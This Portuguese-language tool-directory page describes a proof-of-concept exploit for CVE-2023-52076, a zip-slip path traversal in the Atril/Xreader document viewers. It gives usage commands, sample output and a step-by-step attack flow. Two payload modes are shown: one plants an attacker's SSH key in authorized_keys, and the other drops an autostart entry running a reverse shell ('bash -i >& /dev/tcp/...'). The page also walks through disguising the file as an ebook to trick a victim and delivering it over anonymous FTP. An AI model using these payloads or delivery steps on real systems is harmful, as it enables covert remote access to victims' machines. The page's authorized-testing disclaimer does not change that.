Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/groppoxx/cve-2023-52076-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoEngenharia SocialExploração de Binários
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

Exploit de PoC para CVE-2023-52076 - zip-slip path traversal no Atril/Xreader (MATE/Cinnamon), permitindo escrita arbitrária de arquivos e RCE por meio de um EPUB especialmente criado. Apenas para testes de segurança autorizados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
35há 1 mêsAinda não revisado
Compartilhar

CVE-2023-52076-PoC

Prova de conceito para CVE-2023-52076, uma vulnerabilidade crítica de path traversal e escrita arbitrária de arquivos nos visualizadores de documentos Atril/Xreader que afeta ambientes MATE Desktop.

O script gera um payload EPUB especialmente criado com caminhos zip-slip direcionados à configuração SSH ou a entradas de desktop de inicialização automática, permitindo execução remota de comandos nos sistemas-alvo.

O Que Ele Faz

  1. Suporta dois modos de exploração: injeção de chave SSH ou RCE via autostart.
  2. Gera par de chaves RSA (apenas no modo SSH).
  3. Constrói um EPUB válido com caminhos zip-slip embutidos voltados para extração vulnerável.
  4. Grava o payload em 5 a 9 variantes de caminhos de traversal usando gadgets /proc/self/cwd.
  5. Cria cópias .epub e .pdf (ambas acionam a vulnerabilidade).
  6. Valida a estrutura do payload e verifica todas as entradas.
  7. Opcionalmente, envia o payload via FTP anônimo.

Requisitos

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

Início Rápido

Modo SSH (Recomendado)

Gere o payload SSH localmente:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

Modo Autostart

Gere o payload RCE de autostart com comando personalizado:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

Exemplo Completo

Modo SSH com Upload via FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Exemplo de saída:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

Modo Autostart com Upload via FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Exemplo de saída:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

Flags Opcionais

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

Fluxo de Exploração

Modo SSH

  1. Gerar Payload: o script cria um EPUB com a chave pública nos caminhos de authorized_keys.
  2. Engenharia Social: envie o EPUB/PDF ao alvo (disfarçado de ebook).
  3. Vítima Abre o Arquivo: o Atril/Xreader extrai o conteúdo do EPUB.
  4. Path Traversal: o código vulnerável grava a chave pública em ~/.ssh/authorized_keys.
  5. Acesso SSH: o atacante se conecta usando a chave privada.

Modo Autostart

  1. Gerar Payload: o script cria um EPUB com uma entrada .desktop nos caminhos de autostart.
  2. Engenharia Social: envie o EPUB/PDF ao alvo.
  3. Vítima Abre o Arquivo: o Atril/Xreader extrai o conteúdo do EPUB.
  4. Path Traversal: o código vulnerável grava o .desktop em ~/.config/autostart/.
  5. Gatilho: no próximo logout/login, o arquivo .desktop executa automaticamente o comando.

Pontos-Chave

  • Nenhum nome de usuário necessário: o gadget /proc/self/cwd é resolvido no momento da extração.
  • Múltiplas variantes de caminho: 9 caminhos para SSH, 5 para autostart, maximizando o sucesso em diferentes profundidades de diretório.
  • Sem sobrescrita de arquivos: cria apenas novos arquivos (respeita a limitação da CVE).
  • Modo offline: gere payloads sem entrega via FTP (use --upload apenas quando necessário).
  • Comandos flexíveis: o modo autostart suporta qualquer comando bash.
  • O modo SSH é imediato: nenhuma interação da vítima é necessária após a abertura do arquivo.
  • Autostart exige novo login: a vítima precisa fazer logout/login para o RCE ser acionado.

Notas

  • Versões afetadas: Atril (MATE DE), Xreader (Cinnamon, Linux Mint) < 1.26.2.
  • Testado em: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu.
  • Exige que a vítima abra o documento forjado no visualizador vulnerável.
  • Funciona offline; nenhum retorno de rede para o atacante durante a exploração.
  • Melhor prática: entregar via FTP (--upload) para evitar hospedagem direta.

Aviso Legal

Esta PoC é destinada a testes de segurança autorizados, ambientes de laboratório e verificação de vulnerabilidades. Não a utilize contra sistemas sem permissão explícita.

Baixar ferramenta